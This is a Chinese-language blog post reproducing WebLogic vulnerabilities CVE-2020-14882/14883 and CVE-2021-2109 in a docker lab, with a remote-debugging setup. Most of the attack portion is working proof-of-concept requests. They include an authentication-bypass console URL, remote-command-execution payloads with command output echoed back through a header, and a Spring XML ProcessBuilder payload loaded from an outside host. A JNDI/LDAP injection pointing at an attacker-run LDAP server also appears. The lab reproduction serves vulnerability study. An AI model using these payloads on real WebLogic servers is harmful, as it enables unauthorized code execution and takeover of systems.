Weblogic几个高危CVE复现

Remote Debug

准备远程调试环境

  • IDEA
  • 本地下载远程weblogic工程目录
  • 本地jdk和远程版本一样
  • 打开远程debug并且配置端口号
  • idea配置好远程调试配置文件

这里我用的docker是1036版本,jdk为1.6.0_45

  1. 先在docker里面修改远程调试配置文件:vi /root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh在大约343行周围修改并添加:JAVA_DEBUG=”true”
    export JAVA_DEBUG
    debugFlag=”true”
    export debugFlag然后restart容器
  2. 直接把docker里面的整个文件拔下来docker cp weblogic:/root ./weblogic_jars这里把所有jar包整出来放在test文件夹下面mkdir testsudo find ./ -name *.jar -exec cp {} ./test/ \;整理一下得到如下目录
  • weblogic_docker
    • jdk(docker里面的jdk版本)
    • Oracle(这里面存放了weblogic的整个项目工程代码文件)
    • test(存放了所有jar包)
  1. 然后用idea打开整个weblogic_dockerEdit configurations: 左上角添加一个Remote JVM Debug,改一下Host和Post(8453)即可然后配置一下Project Structure ==>> JDK Version && Libraries 选择之前弄好的test文件点击Debug看到console里面信息: Connected to the target VM, address: ‘192.168.112.129:8453’, transport: ‘socket’代表连接成功,至此,jar包都能成功打开,调试环境准备完毕!

CVE-2020-14882/14883

环境搭建

这里复现直接用的docker,贴一下版本

docker版本说明
vulhub/weblogic:12.2.1.3-2018java version “1.8.0_151”
vulhub/weblogic:10.3.6.0-2017java version “1.6.0_45”

POC

未授权访问控制台(10,12)

http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

RCE GET Poc(12)

http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/succ%27);%22);

RCE POST Poc(12)

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");

RCE GET Poc(12)回显

GET /console/css/%252e%252e%252fconsolejndi.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) {String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();res.getWriter().write("");}executeThread.interrupt();"); HTTP/1.1
Host:192.168.112.129:7001
cmd: ls
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/85.0.4183.121 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip, deflate
Accept-Language:zh-CN,zh;q=0.9
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 0

RCE POST Poc(12)回显

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
cmd: id&&whoami
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1208

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) {String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();res.getWriter().write("");}executeThread.interrupt();");

XML加载

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
       <constructor-arg>
         <list>
           <value>cmd</value>
           <value>/c</value>
           <value><![CDATA[dir]]></value>
         </list>
       </constructor-arg>
   </bean>
</beans>

linux下为bash -c

访问XML文件

http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.0.1/rce.xml")

CVE-2021-2109

环境说明

  • weblogic10.3.6.0 based on docker
  • jdk1.6.0_45
  • idea IntelliJ IDEA 2020.3.1 (Ultimate Edition) Runtime version: 11.0.9.1+11-b1145.63 amd64

POC

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

java -jar JNDIExploit-v1.11.jar -i 192.168.112.129

POST /console/css/%252e%252e%252fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.112;129:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.204.131:49163
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
cmd: ipconfig
Cookie: ADMINCONSOLESESSION=nM8lXW3nshhqyFuWs47qjIiQP0tUMtRYRHbBUFDXA8QIxRpdyNqr!964275826
Upgrade-Insecure-Requests: 1

Debug

打开idea里面的RemoteDebug

这里先找一下命令执行具体代码的地方在哪,python开了一个http.server然后命令执行curl探测一下命令执行的地方,发现在:

\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar!\com\bea\console\actions\jndi\JNDIBindingAction.class

的第57行:

Object boundObj = c.lookup(context + "." + bindName);
// context = "ldap://192.168.112"
// bindname = "129:1389/Basic/WeblogicEcho"
-----------------------------------------------
public ClassLoader getContextClassLoader() {
       return this.contextClassLoader;
  }
//weblogic_jars\test\wlthint3client.jar!\weblogic\work\ExecuteThread.class
------------------------------------------------
protected Object childValue(Object var1) {
           return ((ResettableThreadLocal.ThreadStorage)var1).createChildCopy();
      }
//weblogic_jars\test\wlclient.jar!\weblogic\kernel\FinalThreadLocal.class
----------------------------------------------------
protected Object childValue(Object var1) {
           Thread var2 = Thread.currentThread();
           if (var2 instanceof AuditableThread) {
               return new FinalThreadLocal.FinalThreadStorage(((AuditableThread)var2).finalThreadStorage);
          }

跟进一下:看不懂!

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇